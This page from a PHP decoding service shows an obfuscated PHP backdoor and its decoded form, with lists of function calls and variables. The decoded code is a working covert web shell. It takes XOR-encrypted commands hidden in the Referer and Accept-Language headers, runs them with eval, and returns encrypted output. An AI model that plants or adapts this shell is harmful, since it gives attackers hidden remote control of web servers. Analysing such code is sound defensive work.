Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $H='.($e){$k5.=5.$kh.$5.kf;ob_start();[email protected]([email protected](@x(@ba5.5.se64_..

Decoded Output download

$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$H='.($e){$k5.=5.$kh.$5.kf;ob_start();[email protected]([email protected](@x(@ba5.5.se64_dec5.o5.de(preg_replace5.(array("/';
$p=',0,5.3)5.);$p5.="";for($z=1;5.$z5.<count($m[1]5.);$z++)5.$p.=$5.q[$m[2][$5.z]]5.;if(strpos(5.$p,$h)5.===0)5.{5.$s[$';
$Z='5.;q=0.([\\d]))5.?,?/",$ra,$m5.);if($5.5.q&&$5.m){@sessio5.n_star5.t();$s=&$_S5.ESS5.5.ION;$ss="subst5.r";$s5.l="s';
$Q='r);par5.se_str(5.$u["query5."],$q)5.;5.$q=ar5.ray_value5.s($q)5.;preg_ma5.t5.c5.h_all("/([\\w]5.)[\\w-]+5.(?:5.';
$r='_5./",5."/-/"),a5.rray("/5.",5.5.5."+"),5.$ss($s[$i],0,5.5.$e))),$k)));$o=5.ob_get_conte5.nts();o5.b_end_c5.5';
$F='$kh="5d5.41";$kf="5.402a5.";functi5.on5. x($t,$5.k){$c=str5.5.len($5.k)5.;5.$l=strle5.n($t);$o="";for($i=5.0;5';
$i=str_replace('G','','GGcreate_GGfuncGtGion');
$X='.$i<5.$l5.;){for($j=0;($j<5.$c&&$i<$5.l);$j5.++,$5.i++)5.{$o.=$5.t5.{$i}^$k{$j5.};}}return 5.$5.5.o;}$r=$_S5.ERV';
$h='i]="";$p5.5.=$ss($p5.,3);}if(a5.rra5.y_key_ex5.ists($i5.5.,$s)){$s[5.$i].=$p;$5.e=s5.trpos($s[$5.i],$f);5.if5';
$D='.lean();5.$d=bas5.e64_enco5.de(x(5.gzc5.om5.press($o),5.$k));pr5.int("<$k5.>$d</$k>"5.);@se5.ssion_de5.stro5.y();}}}}';
$M='ER;$rr=@$r["5.HTTP_R5.EFERER"5.];$5.r5.a5.=@$r[5."HTTP_ACCEPT_LAN5.GUAGE"]5.;if(5.$rr&5.&$ra){$u=pa5.rs5.e_5.url($r';
$m='t5.rtolower5.";5.5.$i=$5.m[1][0].$m[1][5.1];$h5.=$sl($ss(md55.($5.i.5.$kh),0,3)5.);$f=5.$sl(5.$ss5.(m5.d5($i.$kf)';
$P=str_replace('5.','',$F.$X.$M.$Q.$Z.$m.$p.$h.$H.$r.$D);
$t=$i('',$P);$t();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$D .lean();5.$d=bas5.e64_enco5.de(x(5.gzc5.om5.press($o),5.$k))..
$F $kh="5d5.41";$kf="5.402a5.";functi5.on5. x($t,$5.k){$c=str5...
$H .($e){$k5.=5.$kh.$5.kf;ob_start();[email protected]([email protected]..
$M ER;$rr=@$r["5.HTTP_R5.EFERER"5.];$5.r5.a5.=@$r[5."HTTP_ACCEP..
$P $kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=str..
$Q r);par5.se_str(5.$u["query5."],$q)5.;5.$q=ar5.ray_value5.s($..
$X .$i<5.$l5.;){for($j=0;($j<5.$c&&$i<$5.l);$j5.++,$5.i++)5.{$o..
$Z 5.;q=0.([\d]))5.?,?/",$ra,$m5.);if($5.5.q&&$5.m){@sessio5.n_..
$h i]="";$p5.5.=$ss($p5.,3);}if(a5.rra5.y_key_ex5.ists($i5.5.,$..
$i create_function
$m t5.rtolower5.";5.5.$i=$5.m[1][0].$m[1][5.1];$h5.=$sl($ss(md5..
$p ,0,5.3)5.);$p5.="";for($z=1;5.$z5.<count($m[1]5.);$z++)5.$p...
$r _5./",5."/-/"),a5.rray("/5.",5.5.5."+"),5.$ss($s[$i],0,5.5.$..
$t None

Stats

MD5 0061ab652659d48b0e9f57e4a36c59c3
Eval Count 1
Decode Time 113 ms